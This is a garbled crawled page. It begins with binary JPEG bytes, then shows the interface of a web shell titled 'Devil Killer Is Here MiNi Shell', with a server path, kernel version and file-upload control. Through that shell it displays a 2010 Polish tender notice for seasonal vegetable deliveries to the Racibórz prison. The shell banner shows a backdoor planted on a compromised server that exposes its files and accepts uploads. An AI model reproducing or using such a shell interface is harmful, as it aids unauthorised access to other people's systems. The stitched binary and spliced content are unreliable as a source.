JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368954-N-2010.html

<p class="kh_header"><b>Racibórz: Przetarg nieograniczony na dostawy warzyw sezonowych na rok 2011</b><br>
<b>Numer ogłoszenia: 368954 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Eichendorffa 14, 47-400 Racibórz, woj. śląskie, tel. 032 4539600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy warzyw sezonowych na rok 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów spożywczych (warzyw sezonowych) wymienionych w poniższej tabeli, w szacunkowych ilościach podanych w w/w tabeli. Przedmiot zamówienia powinien spełniać wymagania zawarte w opisie oraz:
spełniać wymagania zawarte w ustawie o warunkach zdrowotnych żywności i żywienia (Dz.U. 2001r.  Nr 63 poz.634 z późn. zm.) oraz rozporządzeń wydanych na jej podstawie
spełniać wymagania zawarte w ustawie z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz.U. z 2005 r. Nr 187, poz. 1577, z późń. zm.)
spełniać wymagania Unii Europejskiej dla świeżych owoców i warzyw objętych wspólną organizacją rynku zgodnie z rozporządzeniem Komisji (WE) nr 2200 96 z późn. zm. oraz rozporządzeniem komisji (WE) NR 771 2009
spełniać Polskie Normy określone rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dn. 31 lipca 2002r w sprawie obowiązku stosowania polskich norm (Dz. U. 2002 r. Nr 134 poz.1132)
spełniać wymagania zawarte w rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z dn. 16 grudnia 2002r w sprawie znakowania środków spożywczych  dozwolonych substancji dodatkowych (Dz. U. 2002r. Nr 220 poz.1856 )
być dostarczony do zamawiającego w początkowym terminie przydatności do spożycia lub daty minimalnej trwałości
1. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
grupa I
1.Botwina(burak liściowy)
Zgodnie z PN-R-75384:1997
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, o świeżym wyglądzie
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinny być zwiędniętae nadpleśniałe, nagdnite;
bez żółtych, czy zdrewniałych liści, pakowana wg standardu
dostawa:średnio co 2 tygodnie
ilość [kg]
400

grupa II
1. Pomidory kl. I
Zgodne z :PN-91 R-75368, ROZPORZĄDZENIE KOMISJI (WE) NR 771 2009
Zamawiający wymaga aby dostarczane produkty  były:
-          całe;
-          zdrowe; nie dopuszcza się pomidorów z objawami gnicia lub z takimi zmianami, które czynią je niezdatnymi do spożycia;
-          czyste, praktycznie wolne od jakichkolwiek widocznych zanieczyszczeń obcych;
-          o świeżym wyglądzie;
-          praktycznie wolne od szkodników;
-          praktycznie wolne od uszkodzeń spowodowanych przez szkodniki;
-          wolne od nadmiernego zawilgocenia powierzchniowego; 
-          bez obcych zapachów i lub smaków.

Stopień rozwoju i stan pomidorów powinny być takie, aby mogły:
-     wytrzymać transport i manipulacje, oraz
-     dotrzeć do miejsca przeznaczenia zachowując zadowalającą jakość.
Klasa I - Pomidory w tej klasie powinny być dobrej jakości, wystarczająco jędrne i mieć cechy charakterystyczne dla danej odmiany. Nie dopuszcza się pęknięć i widocznych zielonych piętek. 
Dopuszcza się następujące niewielkie wady, pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd pomidorów, ich trwałość i wygląd w opakowaniu:
-          niewielkie wady kształtu lub rozwoju,
-          niewielkie wady barwy,
-          niewielkie wady skórki,
-          bardzo niewielkie odgniecenia.
Ponadto pomidory żebrowane mogą mieć:
-          zabliźnione pęknięcia o długości nie większej niż 1 cm,
-          niewielkie wypukłości,
-          małą nieskorkowaciałą narośl,
-          skorkowacenie blizny słupkowej nie przekraczające 1cm2,
-          delikatne zabliźnienie słupkowe o kształcie wydłużonym, robiące wrażenie szwu, którego długość nie może być większa niż 2 3 największej średnicy pomidora.
Dla pomidorów minimalną średnicę ustala się: - 35 mm dla pomidorów okrągłych i żebrowanych, - 30 mm dla pomidorów podłużnych. Przedziały wielkości  - 30 mm i powyżej, lecz poniżej 35 mm (podłużne), - 35 mm i powyżej, lecz poniżej 40 mm, - 40 mm i powyżej, lecz poniżej 47 mm, - 47 mm i powyżej, lecz poniżej 57 mm, - 57 mm i powyżej, lecz poniżej 67 mm, - 67 mm i powyżej, lecz poniżej 82 mm, - 82 mm i powyżej, lecz poniżej 102 mm, - 102 mm i powyżej.
Tolerancja odnośnie jakości:
10 % liczbowo lub masowo pomidorów nie spełniających wymagań klasy I, lecz zgodnych z wymaganiami dla klasy II. W ramach tej tolerancji nie więcej niż 1 % pomidorów może nie spełniać wymagań klasy II lub wymagań minimalnych. Nie dopuszcza się pomidorów z objawami gnicia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. W przypadku pomidorów gałązkowych 5 % liczbowo lub masowo pomidorów oderwanych od gałązki.
Tolerancje odnośnie wielkości:Dla wszystkich klas jakości dopuszcza się: 10 % liczbowo lub masowo pomidorów odpowiadających  wielkości bezpośrednio większej lub mniejszej od deklarowanej.  Sposób pakowania powinien być taki, aby należycie chronił pomidory przed uszkodzeniem. 
Materiały stosowane do wykładania wnętrza opakowania powinny być nowe, czyste i takiej jakości, aby zapobiegały jakimkolwiek uszkodzeniom zewnętrznym lub wewnętrznym produktu. Użycie materiałów, zwłaszcza papieru ze specyfikacją handlową jest dozwolone pod warunkiem, że nadruk lub etykieta zostaną wykonane nietoksycznym tuszem lub klejem.
Opakowania nie powinny zawierać żadnych zanieczyszczeń obcych.
Na każdym opakowaniu należy umieścić następujące informacje, zgrupowane na tej samej stronie, naniesione w sposób czytelny, trwały oraz widoczny z zewnątrz.
A.         Identyfikacja
Pakujący ilub wysyłający.
- nazwa i adres (np. ulica, miasto, region, kod pocztowy i państwo jeśli jest różne od kraju pochodzenia)
lub oznaczenie kodowe oficjalnie uznane przez organ krajowy
B.         Nazwa produktu
Pomidory 
C.         Pochodzenie produktuKraj pochodzenia
Dostawa: 2 razy w tygodniu:
od 10-06-20010 do 30-09 -20010 w ilościach 100-200 kg(na tydzień)
do 09-06-2010 oraz od  01-10-2010 do 20-12-2010 w ilościach ok 10-20kg(na tydzień)
w okresie Świąt Wielkanocnych oraz Bożego Narodzenia - ok 300 kg

Pomidory powinny być jednolite, tj. tego samego pochodzenia, tej samej odmiany lub typu handlowego, tej samej jakości i wielkości
ilość [kg]
3000
grupa III
1. Kalarepa
 Zgodne z PN-R-75376:1996
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, 
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinny być zaparzone, nadgniłe, łykowate;
pakowana: w skrzynki lub luzem
dostawa: ok. 2 razy w tygodniu w ilościach od 50 - 150 kg
ilość [kg]
3000
grupa IV
1. Rabarbar 
Zgodne  z PN-72 R-75361 200
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, 
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinnny być zaparzone, nadgniłe, łykowate; pakowany: w skrzynki lub luzem
dostawa:  2 razy w tygodniu w ilościach od 50 - 150 kg
ilość [kg]
2200
grupa V
Brukselka kl I (kapusta brukselska)
zgodnie z zał.  do rozporządzenia Komisji (EWG) nr 1591 87 z dnia 5 czerwca 1987 r. Oraz zmianami wprowadzonymi  rozporządzeniami Komisji (WE) nr 888 97 oraz Nr 46 2003. Norma EKG ONZ FFV-08
  wymagań jakościowych w odniesieniu do kapusty brukselskiej po jej przygotowaniu i opakowaniu.
A. Wymagania minimalne
We wszystkich klasach, z zastrzeżeniem szczególnych przepisów dla każdej klasy i przyznanych tolerancji, kapusta brukselska musi być:
- w stanie nienaruszonym,
- zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
- o świeżym wyglądzie,
- czysta, praktycznie pozbawiona jakichkolwiek widocznych substancji obcych,
- niezmrożona,
- wolna od owadów i lub innych pasożytów,
- pozbawiona nadmiernego zawilgocenia zewnętrznego,
- wolna od wszelkich obcych zapachów i/lub smaków.
Szypułka odciętej kapusty brukselskiej musi być obcięta tuż poniżej liści zewnętrznych. W kapuście brukselskiej nieodciętej szypułka musi być złamana u nasady; miejsce cięcia lub złamania musi być czyste, bez  przylegających innych części rośliny.
Stan kapusty brukselskiej musi być taki, aby mogła ona:
- wytrzymać transport i przeładunek, oraz
- dotrzeć do miejsca przeznaczenia w zadowalającym stanie.
Klasa I
Kapusta brukselska w tej klasie powinna być dobrej jakości oraz musi być:
- zwarta,
- zamknięta,
- pozbawiona uszkodzeń spowodowanych mrozem.
Odcięta kapusta brukselska musi mieć odpowiednią barwę. W odniesieniu do nieodciętej kapusty brukselskiej dopuszcza się lekkie odbarwienie liści u nasady oraz lekkie uszkodzenie liści zewnętrznych spowodowane odrywaniem, sortowaniem lub pakowaniem, pod warunkiem, że nie wpływają one na stan produktu.
 
Wielkość określa się na podstawie największej średnicy przekroju poprzecznego.
Minimalna średnica przekroju wynosi:
- 10 mm dla kapusty brukselskiej odciętej klasy I oraz
W każdym opakowaniu kapusty brukselskiej klasy I dopuszczalna różnica między największą a najmniejszą główką nie może przekraczać 20 mm.
 
W każdym opakowaniu dopuszcza się tolerancje w odniesieniu do jakości i wielkości produktu, który nie spełnia wymagań określonych dla danej klasy.
A. Tolerancje dotyczące ilości
i) Klasa I
10 % według wagi kapusty brukselskiej niespełniającej wymagań dla klasy, lecz zgodnych z wymaganiami dla klasy II lub wyjątkowo mieszczących się w granicach tolerancji ustalonych dla tej klasy.
B. Tolerancje dotyczące wielkości
Dla wszystkich klas: 10 % wagi kapusty brukselskiej niespełniającej wymagań w zakresie wielkości.
 
Zawartość każdego opakowania musi być jednolita oraz musi obejmować kapustę brukselską tego samego pochodzenia, odmiany, jakości i wielkości. Widoczna część zawartości każdego opakowania musi być
reprezentatywna dla całej zawartości.

B. Opakowanie
Opakowanie musi zapewniać właściwą ochronę kapusty brukselskiej. Materiały stosowane wewnątrz opakowania muszą być nowe, czyste i takiej jakości, aby zapobiegały jakimkolwiek uszkodzeniom
zewnętrznym lub wewnętrznym produktu. Stosowanie materiałów, w szczególności papierowych lub pieczęci ze specyfikacją handlową jest dozwolone pod warunkiem, że nadruk i etykieta wykonane są nietoksycznym tuszem lub klejem. Opakowania nie mogą zawierać żadnych obcych substancji.
Naklejki umieszczane indywidualnie na produktach nie mogą, po usunięciu, pozostawiać widocznych śladów kleju ani prowadzić do uszkodzeń skórki.
 
Na każdym opakowaniu należy umieścić następujące informacje, zgrupowane po tej samej stronie, naniesione w sposób czytelny i trwały oraz widoczne z zewnątrz:
Nazwa i adres podmiotu pakującego i lub wysyłającego
Wzmiankę tę można zastąpić:
- dla wszystkich opakowań z wyjątkiem opakowań indywidualnych, oficjalnie wydanym lub zaaprobowanym oznaczeniem kodu określającego podmiot pakujący i lub wysyłający, umieszczonym w bliskim sąsiedztwie określenia Podmiot pakujący i lub wysyłający(lub odpowiednich skrótów);
B. Rodzaj produktu
Kapusta brukselska odcięta lub Kapusta brukselska nieodcięta, jeśli zawartość opakowania nie jest widoczna z zewnątrz.
C. Pochodzenie produktu
Kraj pochodzenia i, nieobowiązkowo, region uprawy lub krajowa, regionalna albo lokalna nazwa miejsca.
D. Specyfikacje handlowe
Klasa; w przypadku sortowania według wielkości, wielkość wyrażona jako średnica minimalna i maksymalna.
Dostawa: 2 razy w tygodniu w ilościach od 50 - 150 kg
ilośc [kg]
2000


Do każdej partii dostawczej należy dołączyć specyfikację zawierającą  następujące informacje:
1.nazwę produktu,
2.masę netto,
3.nazwę dostawcy - producenta, adres,
4.kraj pochodzenia,
5.warunki przechowywania
oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Wykonawca dostarczy przedmiot zamówienia na swój koszt i ryzyko, specjalistycznym , ubezpieczonym transportem przystosowanym do przewozu żywności, zgodnie z obowiązującymi przepisami.
Dostawy poszczególnych produktów będą wykonywane wg zamówień składanych przez odbiorcę z dwudniowym wyprzedzeniem. Zamówienia będą składane i przyjmowane telefonicznie, faksem lub w czasie dostawy (na następną dostawę). 
Wykonawca wszystkie dostawy artykułów spożywczych do odbiorcy będzie realizował od poniedziałku do piątku w  godz. od 8:00 do 10:00. W wyjątkowych sytuacjach dopuszczalna jest zmiana godziny dostawy po uprzednim uzgodnieniu telefonicznym pomiędzy dostawcą i odbiorcą (dostawy winny być realizowane w godzinach pracy magazynu odbiorcy). 
Opakowania  jednostkowe oraz transportowe (zbiorcze) powinny być oznakowane i zawierać informacje dotyczące m.in.: nazwy i adresu producenta, nazwy dystrybutora, nazwy towaru, jego klasy jakości, daty produkcji, terminu przydatności do spożycia. Opakowania powinny być wykonane z materiałów przeznaczonych do kontaktu z żywnością.
Dostawy realizowane będą w opakowaniach stosowanych dla konsumentów zbiorowych - maksymalnie 30 kg (opakowanie zbiorcze), a dostawy w opakowaniach jednostkowych nie mogą przekraczać 25 % całości zamówienia danego produktu.
  Podane szacunkowe potrzeby są zbliżone ilościami do planowanych potrzeb. Służyć one będą wyłącznie do porównania ofert oraz do wybrania oferty najkorzystniejszej, bowiem w przybliżeniu odpowiadają strukturze zapotrzebowania. Oznacza to, że wielkości te nie stanowią ostatecznego rozmiaru zamówienia, w wyniku czego nie mogą stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw.
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu
 Dostawy realizowane będą w konkretnie wskazanym w zamówieniu terminie, pod rygorem odmowy przyjęcia dostaw. 
Dostawa  do magazynu żywnościowego Zakładu Karnego w Raciborzu bez pobierania dodatkowych opłat, zgodnie z wcześniejszym zamówieniem. Środek transportu musi odpowiadać warunkom sanitarnym oraz przepisom HACCP. 
Wykonawca dostarcza na żądania zamawiającego atestaty jakości (lub certyfikaty jakości, jeżeli takie posiada). 
W uzasadnionych przypadkach zamawiający zastrzega sobie prawo dokonania, na koszt dostawcy badania dostarczanego towaru pod względem spełniania wymagań określonych w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6, 03.22.12.40-0, 03.22.10.00-6, 03.22.14.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY  NIE WYMAGA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonego oświadczenia; zgodnie z kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,wykonawca złoży wraz z ofertą:
wykaz wykonanych dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom  stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie; ocena zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonego oświadczenia; zgodnie z kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonego oświadczenia; zgodnie z kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonego oświadczenia; zgodnie z kryterium spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
